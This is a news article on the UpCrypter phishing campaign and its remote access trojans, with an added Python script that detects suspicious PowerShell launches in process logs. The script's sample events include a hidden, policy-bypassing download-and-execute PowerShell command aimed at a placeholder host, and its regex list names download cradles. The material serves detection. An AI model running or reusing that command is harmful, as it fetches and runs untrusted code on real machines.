A widespread phishing campaign leveraging the UpCrypter malware is targeting Windows users globally, with the goal of establishing long-term remote access to compromised systems. Cybersecurity researchers at Fortinet’s FortiGuard Labs have been tracking the surge in these attacks since early August 2025.
The attack vector involves phishing emails disguised as missed voicemails or purchase orders. These emails redirect victims to convincing fake websites that prompt them to download a ZIP file. This ZIP archive contains a heavily obfuscated JavaScript dropper.
According to Cara Lin, a Fortinet FortiGuard Labs researcher, these malicious pages are designed to lure recipients into downloading seemingly harmless JavaScript files. Once executed, the JavaScript triggers PowerShell commands in the background, establishing a connection with attacker-controlled servers to download the next stage of the malware.
The UpCrypter loader then scans the compromised system for sandbox environments or forensic tools. If detected, UpCrypter will force a reboot to disrupt analysis. If no such obstacles are present, UpCrypter downloads and executes further payloads, sometimes concealing these files within images using steganography to evade antivirus detection.
The final stage of the attack involves deploying remote access tools (RATs), including PureHVNC, DCRat (DarkCrystal RAT), and Babylon RAT. PureHVNC allows for hidden remote desktop access, while DCRat provides a multifunction tool for spying and data theft. Babylon RAT enables attackers to gain complete control over the infected device.
Fortinet researchers have observed that the attackers employ various techniques to conceal their malicious code. These include string obfuscation, modification of registry settings for persistence, and in-memory code execution to minimize traces on the disk.
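The two behaviours described above, a JavaScript file spawning PowerShell in the background and in-memory execution that leaves little on disk, both surface in process-creation telemetry. The following detection check is an added example, not code from Fortinet or FortiGuard Labs, and makes several assumptions that are not in the article: that the dropper is executed by the Windows script hosts wscript.exe or cscript.exe (the usual hosts for a .js file), that the log uses a simple `key=value|key=value` layout modelled on Sysmon Event ID 1 fields, and that the command-line traits it scores (hidden window, encoded command, download cradle, execution-policy bypass) are typical of a background download stage. The sample log lines are constructed for the example.

```python
"""Flag process-creation events where PowerShell is started in a way that
matches a script-host dropper (added example; not Fortinet's code)."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional

# Assumption: a .js dropper runs under one of these hosts on Windows.
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line traits that raise suspicion. These are assumptions about how a
# background download stage is usually invoked, not quotes from the article.
SUSPICIOUS_ARGS = [
    (re.compile(r"-(?:w|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I), "download cradle"),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass", re.I), "execution policy bypass"),
]


@dataclass
class Finding:
    pid: int
    reasons: List[str]


def parse_event(line: str) -> Dict[str, str]:
    """Parse the constructed 'key=value|key=value' layout into a dict.
    A real pipeline would read structured JSON/EVTX instead; this format
    is only used to keep the example self-contained."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze_event(event: Dict[str, str]) -> Optional[Finding]:
    """Score a single process-creation event; return a Finding or None."""
    image = basename(event.get("Image", ""))
    parent = basename(event.get("ParentImage", ""))
    cmdline = event.get("CommandLine", "")
    if image not in POWERSHELL:
        return None
    reasons = []
    if parent in SCRIPT_HOSTS:
        reasons.append(f"PowerShell spawned by script host {parent}")
    for pattern, label in SUSPICIOUS_ARGS:
        if pattern.search(cmdline):
            reasons.append(label)
    # Alert on the script-host parent alone, or on two or more command-line
    # traits together, so a lone "-ExecutionPolicy Bypass" from an admin's
    # scheduled script is not reported on its own.
    if parent in SCRIPT_HOSTS or len(reasons) >= 2:
        return Finding(int(event.get("ProcessId", "0")), reasons)
    return None


def scan_log(lines: Iterable[str]) -> List[Finding]:
    """Run analyze_event over every non-empty line and collect the findings."""
    findings = []
    for line in lines:
        if line.strip():
            finding = analyze_event(parse_event(line))
            if finding:
                findings.append(finding)
    return findings


# Constructed sample events. Host names, paths and the base64 blob are
# placeholders, not indicators from the campaign.
SAMPLE_LOG = [
    r"ProcessId=4120|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\System32\wscript.exe"
    r"|CommandLine=powershell.exe -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/stage2'))",
    r"ProcessId=5000|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
    r"|ParentImage=C:\Windows\explorer.exe"
    r"|CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r"ProcessId=6100|Image=C:\Windows\System32\notepad.exe"
    r"|ParentImage=C:\Windows\explorer.exe|CommandLine=notepad.exe",
    r"ProcessId=7010|Image=C:\Program Files\PowerShell\7\pwsh.exe"
    r"|ParentImage=C:\Windows\System32\svchost.exe"
    r"|CommandLine=pwsh.exe -WindowStyle Hidden -EncodedCommand AAAAAAAAAAAAAAAAAAAAAAAAAAAA",
]

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(f"PID {finding.pid}: {'; '.join(finding.reasons)}")
```

Run as-is, the script reports PID 4120 (script-host parent plus three command-line traits) and PID 7010 (hidden window and encoded command), while the administrator's scheduled backup script, which only trips the execution-policy check, is left alone. The thresholds are deliberately simple; in a production rule the script-host parent would usually be weighted more heavily and enriched with the signer and path of the parent script.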
The phishing campaign has demonstrated international reach, with significant activity detected in Austria, Belarus, Canada, Egypt, India, and Pakistan. The sectors most heavily targeted include manufacturing, technology, healthcare, construction, and retail/hospitality. Detections of the UpCrypter malware have doubled in a mere two weeks, highlighting the rapid expansion of this campaign.
This attack is not simply about stealing credentials; it aims to deploy a chain of malware designed to remain hidden within corporate systems for an extended period, granting attackers persistent access. Fortinet advises users and organizations to take this threat seriously by implementing strong email filters and providing staff training to recognize and avoid these types of phishing attacks.